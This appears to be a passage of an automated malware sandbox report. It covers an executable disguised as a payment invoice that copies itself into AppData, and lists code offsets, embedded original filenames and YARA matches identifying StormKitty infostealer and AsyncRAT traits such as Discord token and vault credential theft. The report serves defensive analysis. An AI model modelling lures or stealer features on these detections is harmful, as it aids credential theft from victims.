Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D633A	0_2_077D633A
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D7331	0_2_077D7331
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D6391	0_2_077D6391
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DD270	0_2_077DD270
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DC250	0_2_077DC250
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D4250	0_2_077D4250
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DC241	0_2_077DC241
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DCA02	0_2_077DCA02
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D42DF	0_2_077D42DF
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DE130	0_2_077DE130
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DE120	0_2_077DE120
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D89D8	0_2_077D89D8
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D89C8	0_2_077D89C8
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D503A	0_2_077D503A
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_01316390	6_2_01316390
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_01315AC0	6_2_01315AC0
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_0131A178	6_2_0131A178
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_01315778	6_2_01315778
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_01319760	6_2_01319760
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_01319750	6_2_01319750
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_05B705FE	6_2_05B705FE
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_05B70600	6_2_05B70600
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_05B7C108	6_2_05B7C108
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_05B7C0F7	6_2_05B7C0F7
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_05B75D60	6_2_05B75D60
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_05B75D52	6_2_05B75D52
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_02B9D74C	7_2_02B9D74C
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C55DA	7_2_075C55DA
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C6458	7_2_075C6458
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C42F0	7_2_075C42F0
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CD280	7_2_075CD280
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CBC58	7_2_075CBC58
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CDB80	7_2_075CDB80
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C4BA0	7_2_075C4BA0
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C3792	7_2_075C3792
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CC648	7_2_075CC648
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CC638	7_2_075CC638
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C86C0	7_2_075C86C0
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C86B0	7_2_075C86B0
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C74B8	7_2_075C74B8
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C74A8	7_2_075C74A8
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C6371	7_2_075C6371
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C633A	7_2_075C633A
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C6391	7_2_075C6391
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CC250	7_2_075CC250
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C4250	7_2_075C4250
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CC241	7_2_075CC241
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CD270	7_2_075CD270
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C42DE	7_2_075C42DE
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C72C1	7_2_075C72C1
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CE130	7_2_075CE130
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CE120	7_2_075CE120
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C8068	7_2_075C8068
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C503A	7_2_075C503A
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CBF10	7_2_075CBF10
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CBF00	7_2_075CBF00
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C8D29	7_2_075C8D29
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CBC48	7_2_075CBC48
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C8B58	7_2_075C8B58
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C8B49	7_2_075C8B49
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CDB70	7_2_075CDB70
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CC9F9	7_2_075CC9F9
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CC820	7_2_075CC820
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C88C8	7_2_075C88C8
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075C88B9	7_2_075C88B9
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_01716390	11_2_01716390
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_01715AC0	11_2_01715AC0
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_01715778	11_2_01715778
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_01719760	11_2_01719760
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_01719750	11_2_01719750
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_060E0600	11_2_060E0600
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_060E05FE	11_2_060E05FE
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_060EC0F7	11_2_060EC0F7
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_060EC108	11_2_060EC108
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_060E5D52	11_2_060E5D52
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_060E5D60	11_2_060E5D60

Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Invoice-BL. Payment TT $ 28,945.99.exe
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs Invoice-BL. Payment TT $ 28,945.99.exe
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1721220426.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Invoice-BL. Payment TT $ 28,945.99.exe
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs Invoice-BL. Payment TT $ 28,945.99.exe
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Invoice-BL. Payment TT $ 28,945.99.exe
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1736050792.000000000A640000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Invoice-BL. Payment TT $ 28,945.99.exe
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723026401.0000000003002000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs Invoice-BL. Payment TT $ 28,945.99.exe
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1724985848.0000000006DE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Invoice-BL. Payment TT $ 28,945.99.exe
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000000.1648321073.0000000000952000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamehQcr.exe4 vs Invoice-BL. Payment TT $ 28,945.99.exe
Source: Invoice-BL. Payment TT $ 28,945.99.exe	Binary or memory string: OriginalFilenamehQcr.exe4 vs Invoice-BL. Payment TT $ 28,945.99.exe

Source: Invoice-BL. Payment TT $ 28,945.99.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
